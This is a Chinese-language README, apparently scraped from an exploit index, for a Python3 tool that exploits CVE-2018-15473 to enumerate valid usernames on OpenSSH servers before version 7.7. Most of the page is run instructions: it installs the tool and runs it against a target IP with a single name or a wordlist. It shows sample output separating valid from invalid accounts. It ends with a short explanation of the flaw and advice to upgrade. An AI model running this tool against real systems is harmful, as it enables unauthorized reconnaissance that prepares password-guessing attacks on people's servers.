## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XROBIUL-CVE-2018-15473
## CVE-2018-15473
**SSH-用户名-枚举-漏洞利用(OpenSSH 2.3 < 7.7)**
原始漏洞利用的编辑版本:https://www.exploit-db.com/exploits/45233
* 转换为 Python3
* 添加了用户名字典选项
## 如何运行
root@kitploit:~
#安装依赖:
foo@bar:~$ pip3 install -r requirements.txt
root@kitploit:~
#针对单个用户名:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root 是一个有效用户名
root@kitploit:~
#针对多个用户名:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root 是一个有效用户名
[-] mysql 是一个无效用户名
[-] mike 是一个无效用户名
[-] foo 是一个无效用户名
[-] bar 是一个无效用户名
有效用户:
root
root@kitploit:~
#更多选项:
foo@bar:~$ ./Exploit.py -h
## 关于漏洞:
系统对有效和无效的认证尝试会做出不同响应。远程用户可发送特制请求以确定目标系统上的有效用户名。因此,远程用户能够确定目标系统上的有效用户名。
## 解决方案:
应将 OpenSSH 服务器升级到 7.7 或更高版本。